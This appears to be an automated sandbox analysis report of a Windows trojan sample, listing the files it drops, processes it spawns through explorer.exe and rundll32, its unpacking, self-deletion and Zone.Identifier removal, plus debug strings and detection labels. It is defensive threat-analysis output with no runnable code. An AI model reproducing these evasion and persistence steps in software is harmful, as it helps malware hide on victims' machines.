Source: ADCA.exe.1.dr Static PE information: Resource name: RT_VERSION type: x86 executable not stripped
Source: 5AF.exe.1.dr Static PE information: Resource name: RT_VERSION type: x86 executable not stripped
Source: dfhwrav.1.dr Static PE information: Resource name: RT_VERSION type: x86 executable not stripped
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: capabilityaccessmanagerclient.dll Jump to behavior
Source: 5AF.exe.1.dr Static PE information: Section: .data ZLIB complexity 0.9896875
Source: file.exe Virustotal: Detection: 33%
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\dfhwrav C:\Users\user\AppData\Roaming\dfhwrav
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\ADCA.exe C:\Users\user\AppData\Local\Temp\ADCA.exe
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5AF.exe C:\Users\user\AppData\Local\Temp\5AF.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\5AF.exe "C:\Users\user\AppData\Local\Temp\5AF.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\ADCA.exe C:\Users\user\AppData\Local\Temp\ADCA.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5AF.exe C:\Users\user\AppData\Local\Temp\5AF.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688 Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\dfhwrav Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\ADCA.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@13/9@36/7
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_006FC9EE CreateToolhelp32Snapshot,Module32First, 9_2_006FC9EE
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start
Source: C:\Users\user\AppData\Local\Temp\5AF.exe Mutant created: \Sessions\1\BaseNamedObjects\WTfewgNmxpcaVXHKTu
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4912
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: setupapi.pdbf source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, 5AF.exe, 00000016.00000002.522529716.00000000023B8000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: cryptbase.pdbD source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\dohaf\kaxidin\wukoni\wefof\nojeyuve jucahazetozep zisasime.pdb0f source: 5AF.exe, 00000010.00000000.456599162.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000000.482478776.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msctf.pdby source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: comctl32v582.pdbB source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdb6 source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: fltLib.pdbR source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mpr.pdbA source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: sechost.pdb0 source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Qrundll32.pdb source: WerFault.exe, 00000013.00000003.506255817.0000000004740000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.489353790.000000000473F000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.494807738.000000000473F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Qrundll32.pdb^t source: WerFault.exe, 00000013.00000003.527460296.0000000004740000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.527287787.0000000004740000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: 5AF.exe, 00000010.00000002.485930859.0000000000410000.00000040.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000002.517131758.0000000000410000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb source: ADCA.exe, 0000000A.00000000.410105733.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: iphlpapi.pdbz source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: combase.pdbt source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 5C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb0f source: ADCA.exe, 0000000A.00000000.410105733.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\yepiro_lafonu\vekamogudit62\deney\jef.pdb source: file.exe, 00000000.00000000.243494837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dfhwrav, 00000009.00000000.369163815.0000000000401000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: propsys.pdb` source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc.pdbB source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdbl source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: IC:\yepiro_lafonu\vekamogudit62\deney\jef.pdb0f source: file.exe, 00000000.00000000.243494837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dfhwrav, 00000009.00000000.369163815.0000000000401000.00000020.00000001.01000000.00000007.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: advapi32.pdbJ source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netapi32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, 5AF.exe, 00000016.00000002.522529716.00000000023B8000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powrprof.pdbX source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\dohaf\kaxidin\wukoni\wefof\nojeyuve jucahazetozep zisasime.pdb source: 5AF.exe, 00000010.00000000.456599162.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000000.482478776.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: profapi.pdb^ source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netutils.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netapi32.pdbk source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Unpacked PE file: 10.2.ADCA.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\5AF.exe Unpacked PE file: 16.2.5AF.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\5AF.exe Unpacked PE file: 22.2.5AF.exe.400000.0.unpack
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\dfhwrav Unpacked PE file: 9.2.dfhwrav.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Unpacked PE file: 10.2.ADCA.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.itext:ER;.data:W;.bss:W;.idata:W;.didata:W;.edata:R;.tls:W;.rdata:R;.reloc:R;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\5AF.exe Unpacked PE file: 16.2.5AF.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\5AF.exe Unpacked PE file: 22.2.5AF.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401F47 pushad ; ret 0_2_00401FAF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401F62 pushad ; ret 0_2_00401FAF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401E7D pushad ; ret 0_2_00401FAF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401F2F pushad ; ret 0_2_00401FAF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401F3A pushad ; ret 0_2_00401FAF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004019C7 push esp; retf 0_2_004019C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402DCB push FFFFFF9Bh; retf 0_2_00402DD5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02071A2E push esp; retf 0_2_02071A2F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02071F96 pushad ; ret 0_2_02072016
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02071FA1 pushad ; ret 0_2_02072016
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02071FAE pushad ; ret 0_2_02072016
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02071FC9 pushad ; ret 0_2_02072016
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02071EE4 pushad ; ret 0_2_02072016
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_00401F47 pushad ; ret 9_2_00401FAF
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_00401F62 pushad ; ret 9_2_00401FAF
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_00401E7D pushad ; ret 9_2_00401FAF
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_00401F2F pushad ; ret 9_2_00401FAF
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_00401F3A pushad ; ret 9_2_00401FAF
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_004019C7 push esp; retf 9_2_004019C8
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_00402DCB push FFFFFF9Bh; retf 9_2_00402DD5
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_006D1A2E push esp; retf 9_2_006D1A2F
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_006D1EE4 pushad ; ret 9_2_006D2016
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_006D1FC9 pushad ; ret 9_2_006D2016
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_006D1FAE pushad ; ret 9_2_006D2016
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_006D1FA1 pushad ; ret 9_2_006D2016
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_006D1F96 pushad ; ret 9_2_006D2016
Source: C:\Users\user\AppData\Roaming\dfhwrav Code function: 9_2_006FDD39 push esp; retf 9_2_006FDD3A
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_00422F40 push ecx; mov dword ptr [esp], ecx 10_2_00422F44
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_025CB597 pushad ; iretd 10_2_025CB598
Source: Serpodtudpwhhta.dll.10.dr Static PE information: section name: .didata
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\dfhwrav Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\5AF.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe File created: C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\ADCA.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\dfhwrav Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\file.exe Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\dfhwrav:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Code function: 10_2_0085E760 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 10_2_0085E760
Source: C:\Users\user\AppData\Local\Temp\5AF.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ADCA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
